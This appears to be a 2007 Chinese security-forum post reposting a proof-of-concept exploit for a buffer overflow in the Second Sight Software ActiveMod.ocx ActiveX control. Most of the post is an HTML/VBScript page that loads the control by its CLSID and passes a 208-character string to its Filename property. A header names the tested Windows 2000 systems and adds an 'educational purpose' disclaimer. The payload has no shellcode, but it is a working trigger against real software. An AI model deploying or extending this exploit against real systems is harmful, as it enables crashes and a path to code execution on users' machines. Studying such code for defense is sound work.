Second Sight Software ActiveMod.ocx ActiveX Buffer Overflow POC

ring04h

团队执行官

Rank: 8 Rank: 8

E.S.T核心成员社区主管

帖子: 3923
精华: 128
积分: 209640
阅读权限: 200
性别: 男
在线时间: 1096 小时
注册时间: 2007-10-23
最后登录: 2008-7-23

资料收集奖运营支持奖

发短消息
加为好友
当前离线

楼主大中小发表于 2007-4-25 01:02 只看该作者

Second Sight Software ActiveMod.ocx ActiveX Buffer Overflow POC

复制内容到剪贴板

代码:

<!--



 ===============================================================================================

            Second Sight Software ActiveMod.ocx ActiveX Buffer Overflow POC

                      By Umesh Wanve 

 ==============================================================================================  

    

 Date : 24-04-2007

 

 Tested on Windows 2000 SP4 Server English

      Windows 2000 SP4 Professional English

 

 Reference: [url]http://www.securityfocus.com/bid/23554[/url]



 Vendor: [url]http://www.freetoolsassociation.com[/url]

     [url]http://www.freetoolsassociation.com/fta/activegs/activemod.cab[/url] 





 

 Desc: The filename parameter of CLSID 2078D6EC-693C-4FB2-AE7B-A6B8D2BC4DC8 is vulnerable. This activex gives error like,

   Buffer Overrun detected. This is complied with /GS flag.



 PS. This was written for educational purpose. Use it at your own risk.Author will be not be

   responsible for any damage.

 

 Always thanks to Metasploit and Stroke.



-->





<html>



<title>

 Second Sight Software ActiveMod.ocx ActiveX Buffer Overflow POC - By Umesh Wanve

</title>



<body>

<OBJECT id="target" WIDTH=445 HEIGHT=40 classid="clsid:2078D6EC-693C-4FB2-AE7B-A6B8D2BC4DC8" > </OBJECT>



<script language="vbscript">

targetFile = "C:\Research\activemod\ActiveMod.ocx"

prototype = "Invoke_Unknown Filename As String"

memberName = "Filename"

progid   = "ActiveModLib.ActiveMod"

argCount  = 1



arg1=String(208, "A")



target.Filename = arg1



</script>



</body>



</html>

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » Second Sight Software ActiveMod.ocx ActiveX Buffer Overflow POC